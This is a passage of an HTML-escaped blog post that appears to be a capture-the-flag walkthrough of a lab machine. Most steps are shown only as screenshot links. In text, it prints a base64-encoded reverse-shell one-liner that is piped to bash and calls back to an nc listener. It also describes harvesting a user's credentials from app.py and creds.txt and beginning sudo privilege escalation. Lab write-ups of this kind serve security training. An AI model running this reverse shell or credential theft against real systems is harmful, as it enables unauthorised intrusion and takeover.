href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN1KlvyCnkbofTaESipiMQjDXSTtc1MoWA6KqxCDeyIDUFsn1zQjjYmNPe0qy-nKp1YAh0PVHuZn0CDi4eos10x-hXOd9OIY83JsLPLOwsJ7jKif1gU8_Fk4bqDCk81O3y2fN2-FQXwfId/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;74&quot; data-original-width=&quot;728&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN1KlvyCnkbofTaESipiMQjDXSTtc1MoWA6KqxCDeyIDUFsn1zQjjYmNPe0qy-nKp1YAh0PVHuZn0CDi4eos10x-hXOd9OIY83JsLPLOwsJ7jKif1gU8_Fk4bqDCk81O3y2fN2-FQXwfId/s16000/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a nc listener session at port 4444:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLX8ha5vOUWYRpZ-8DE3ZHPY-WU7MQrwBf1QKnHT-PrF2JxZ29KMrMlMCYfnfQdIwr1o-Dwpmrf2P9E5azZ2oBSq3H4WCZW_t-AnJVlSopa-RoM3-CdT7Yb340JAQ9MICd_1pL66Sh4doB/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;74&quot; data-original-width=&quot;345&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLX8ha5vOUWYRpZ-8DE3ZHPY-WU7MQrwBf1QKnHT-PrF2JxZ29KMrMlMCYfnfQdIwr1o-Dwpmrf2P9E5azZ2oBSq3H4WCZW_t-AnJVlSopa-RoM3-CdT7Yb340JAQ9MICd_1pL66Sh4doB/s16000/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Entering the command to &lt;b&gt;wish, &lt;/b&gt;previously decoding and passing it to bash:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: red; font-family: arial; font-size: medium;&quot;&gt;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTUvNDQ0NCAwPiYxCg== | base64 -d | bash&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMxRlUkeYq8jOVQsabGzTLrERkU1fSo4zjkX9TuZJbeWGojPgRMdP5-nYXCe3aBvh4G2Dx1l98JLPjBpTjXi4QFrRzRUVsU-djlUj9yLc4SDbPSmV4o9xeZtA9dY1sGzNcbZ0f2Q5aJyS3/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;264&quot; data-original-width=&quot;488&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMxRlUkeYq8jOVQsabGzTLrERkU1fSo4zjkX9TuZJbeWGojPgRMdP5-nYXCe3aBvh4G2Dx1l98JLPjBpTjXi4QFrRzRUVsU-djlUj9yLc4SDbPSmV4o9xeZtA9dY1sGzNcbZ0f2Q5aJyS3/s16000/screenshot.26.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally, a remote shell is triggered at Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUE98A4kydCx5xYehWr0WV9GoGp1XTw9o70vO6hpszYHapvz3DvP_9f5dOQBt0QwkvV3qSoRrRgB0rpxerWA9Strb0A4oJlbhSyu7gOlmkwz4f1ER4XCm-_zZKy7JF13Cd17bpEJrqUoaK/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;181&quot; data-original-width=&quot;679&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUE98A4kydCx5xYehWr0WV9GoGp1XTw9o70vO6hpszYHapvz3DvP_9f5dOQBt0QwkvV3qSoRrRgB0rpxerWA9Strb0A4oJlbhSyu7gOlmkwz4f1ER4XCm-_zZKy7JF13Cd17bpEJrqUoaK/s16000/screenshot.27.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJisfdfFwVEZzVShXTwkjFsQAEnqgDhmW4GQzvLCw264-aQxpo8DS1fj81KU9M70PXLI8tKkw0u_f0z2It9q5-ebz_L_nPISL6-w-j2C_harZMgva4cvv0EQO6_MW1vz0QTcVwCW8V-3Zs/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;288&quot; data-original-width=&quot;586&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJisfdfFwVEZzVShXTwkjFsQAEnqgDhmW4GQzvLCw264-aQxpo8DS1fj81KU9M70PXLI8tKkw0u_f0z2It9q5-ebz_L_nPISL6-w-j2C_harZMgva4cvv0EQO6_MW1vz0QTcVwCW8V-3Zs/s16000/screenshot.28.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89xe2TtNa4Wl5NimunamE_q1G64RoXmHiMO43tqaD9-MObQdISYXhJJK6JoIVsN9hmLFxB1aJIeCThQib_FuLBIajcIMTi-zHSJ5PojU4Feevwr3oleHI6WGmCEeIa6XjmEO2uj9ReXPT/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;80&quot; data-original-width=&quot;580&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89xe2TtNa4Wl5NimunamE_q1G64RoXmHiMO43tqaD9-MObQdISYXhJJK6JoIVsN9hmLFxB1aJIeCThQib_FuLBIajcIMTi-zHSJ5PojU4Feevwr3oleHI6WGmCEeIa6XjmEO2uj9ReXPT/s16000/screenshot.30.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Removing the nasty duplicated letters with command &lt;b&gt;stty -echo&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZLNaW76LilmFd2bvObsyP_mXdgHTghOZe0GzZaE9bQFJbQtDnQ05ADxhhjPsFJwS6V15V1pCI2bIlUwM_WqriwGGMOzQoZOECHLo7BSn3iHpulrs3B1HpQ-8HcwGpuVp52r_ajW09ZqeG/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;94&quot; data-original-width=&quot;514&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZLNaW76LilmFd2bvObsyP_mXdgHTghOZe0GzZaE9bQFJbQtDnQ05ADxhhjPsFJwS6V15V1pCI2bIlUwM_WqriwGGMOzQoZOECHLo7BSn3iHpulrs3B1HpQ-8HcwGpuVp52r_ajW09ZqeG/s16000/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Improving the shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfAttnuCFnMGEHwHwi52H_DH9TMuDH1mK5tFq6kCDZYkcmkrvlc0DBGmD5WSDurKu1-p47wO8bSTwhQf_YLqZ5LDYN0V3xQ7JB9D8KoV5lzJIOdHJorJATM8dQf1sLA9MqACXEeyETkqZC/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;783&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfAttnuCFnMGEHwHwi52H_DH9TMuDH1mK5tFq6kCDZYkcmkrvlc0DBGmD5WSDurKu1-p47wO8bSTwhQf_YLqZ5LDYN0V3xQ7JB9D8KoV5lzJIOdHJorJATM8dQf1sLA9MqACXEeyETkqZC/s16000/screenshot.32.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- There are home folders for users &lt;b&gt;nitish&lt;/b&gt; and &lt;b&gt;sam&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx_sbopqYjY1ynFHPVTz3VB-TT1vShNROmWB2KQxbiY-uvnDO4n4NgUtv5i25JwdJjko8zfcg1lfiS4LUnE8thUg2RD3AlSZVFzRZCUFfLqfDBkzF09PXxlfo_SvoEezGQ0cRPPeauGZvE/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx_sbopqYjY1ynFHPVTz3VB-TT1vShNROmWB2KQxbiY-uvnDO4n4NgUtv5i25JwdJjko8zfcg1lfiS4LUnE8thUg2RD3AlSZVFzRZCUFfLqfDBkzF09PXxlfo_SvoEezGQ0cRPPeauGZvE/s16000/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Exploring &lt;b&gt;nitish &lt;/b&gt;we find &lt;b&gt;user.txt&lt;/b&gt;, but access is denied:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivHpmA5jJwNJiUrUcRtLiD8usBBhLegzu5z7_Drg4S80MxJq7TMtBj4MnR2VuwQqFi6yLVNq4iWpJ7EE4mEwjtI8NicywUlRe-HF8QZU5QTab_0Z-YVXloVJiap94N0mW2359lp2EfnDYQ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;231&quot; data-original-width=&quot;650&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivHpmA5jJwNJiUrUcRtLiD8usBBhLegzu5z7_Drg4S80MxJq7TMtBj4MnR2VuwQqFi6yLVNq4iWpJ7EE4mEwjtI8NicywUlRe-HF8QZU5QTab_0Z-YVXloVJiap94N0mW2359lp2EfnDYQ/s16000/screenshot.35.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9NOq45FeN7aBQY94_5kJBRMs5tfpGLKQI61QVfe9ef16ZHBmcO3Rn1olDrqHa9MwDwtfNyfnlnwbVFN-8M6yQQmDVZ8Mo8DLmuZ714VwcCJdsYScuNtM7jp_I_xnRtWVZUdHYmMm8HOX0/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;44&quot; data-original-width=&quot;477&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9NOq45FeN7aBQY94_5kJBRMs5tfpGLKQI61QVfe9ef16ZHBmcO3Rn1olDrqHa9MwDwtfNyfnlnwbVFN-8M6yQQmDVZ8Mo8DLmuZ714VwcCJdsYScuNtM7jp_I_xnRtWVZUdHYmMm8HOX0/s16000/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;app.py&lt;/b&gt; we find a line pointing to &lt;b&gt;nitish&lt;/b&gt; credentials:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZBdd9HeMAuFZlcSGPCA979dHzMwgix1BDW9cE0_7HY4VfLTyu0ce3iWtnMixuNT7CJkUmqFEvDNQJsz27818SkMIcFKzh2BStHJna4C1huZNzovSbuBEXxrH7e6bb_FoUcrtXnCgy38o/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;214&quot; data-original-width=&quot;777&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZBdd9HeMAuFZlcSGPCA979dHzMwgix1BDW9cE0_7HY4VfLTyu0ce3iWtnMixuNT7CJkUmqFEvDNQJsz27818SkMIcFKzh2BStHJna4C1huZNzovSbuBEXxrH7e6bb_FoUcrtXnCgy38o/s16000/screenshot.42.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;- So folder &lt;b&gt;.dev&lt;/b&gt; keeps file &lt;b&gt;creds.txt &lt;/b&gt;with credentials for user &lt;b&gt;nitish&lt;/b&gt;:&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_1Vs-z9gyYCayg-jNa8W2HAuExcCRN8aY8X5IFnC0EG3rHnFDbDsfHLMz6thPgfcISSWHuq_Tdv627319v57IwovAla20aW_QePQZZydCtzAjKDemQtyQTuGg27llEG0iZ4Dxl_oi3LZ/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;612&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic_1Vs-z9gyYCayg-jNa8W2HAuExcCRN8aY8X5IFnC0EG3rHnFDbDsfHLMz6thPgfcISSWHuq_Tdv627319v57IwovAla20aW_QePQZZydCtzAjKDemQtyQTuGg27llEG0iZ4Dxl_oi3LZ/s16000/screenshot.38.jpg&quot; /&gt;&lt;/a&gt;&lt;/p&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk5uX9wuydLs3cgrk448Tw8DZwOWjIeoE1qLg38Wt1mQ_lwIWCoCDSPWGGTLwrJO4fKResMCjWlXIJNvmgmfGTeyuw4yyuzgQGm-EvPPLOBcHMm1JL0_Aus21sJAvZksovgKAQTyCHKWkM/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;116&quot; data-original-width=&quot;603&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk5uX9wuydLs3cgrk448Tw8DZwOWjIeoE1qLg38Wt1mQ_lwIWCoCDSPWGGTLwrJO4fKResMCjWlXIJNvmgmfGTeyuw4yyuzgQGm-EvPPLOBcHMm1JL0_Aus21sJAvZksovgKAQTyCHKWkM/s16000/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;4 - CAPTURING THE 1st FLAG&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, the 1st flag is available:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJLR3lp6ymUcqQsl5WKkliAlZX8DPuunAmufPceLOq_HdX3f4xQXxka9vRwl9tBByvX0wSb3ulteWnR88yJbXoYAGmQ_73kyT_kasJm3SbujS2pEdn7crqhT2jwHIl8dQzNVMso2cCw25K/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;118&quot; data-original-width=&quot;367&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJLR3lp6ymUcqQsl5WKkliAlZX8DPuunAmufPceLOq_HdX3f4xQXxka9vRwl9tBByvX0wSb3ulteWnR88yJbXoYAGmQ_73kyT_kasJm3SbujS2pEdn7crqhT2jwHIl8dQzNVMso2cCw25K/s16000/screenshot.40.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There are different ways to achieve Privilege Escalation, we will try two of them:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5.1 - Sudoers&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking sudoer privileges we learn that &lt;b&gt;nitish&lt;/b&gt; can run command &lt;b&gt;genie&lt;/b&gt; as user &lt;b&gt;sam&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTvuElLerCTH2Kj3HeDm8y7oYyu3vdlg59dLAmcP7N0r_9svEzUmE1oT7V8esFZqm0opIJ7kb14BPhI5Tedq1bhBweZL0Ts65AgynrDyoi3P84PoF4lNKO-MaWmLMbDD7ZyLvMeh30AUU1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;160&quot; data-original-width=&quot;599&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTvuElLerCTH2Kj3HeDm8y7oYyu3vdlg59dLAmcP7N0r_9svEzUmE1oT7V8esFZqm0opIJ7kb14BPhI5Tedq1bhBweZL0Ts65AgynrDyoi3P84PoF4lNKO-MaWmLMbDD7ZyLvMeh30AUU1/s16000/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 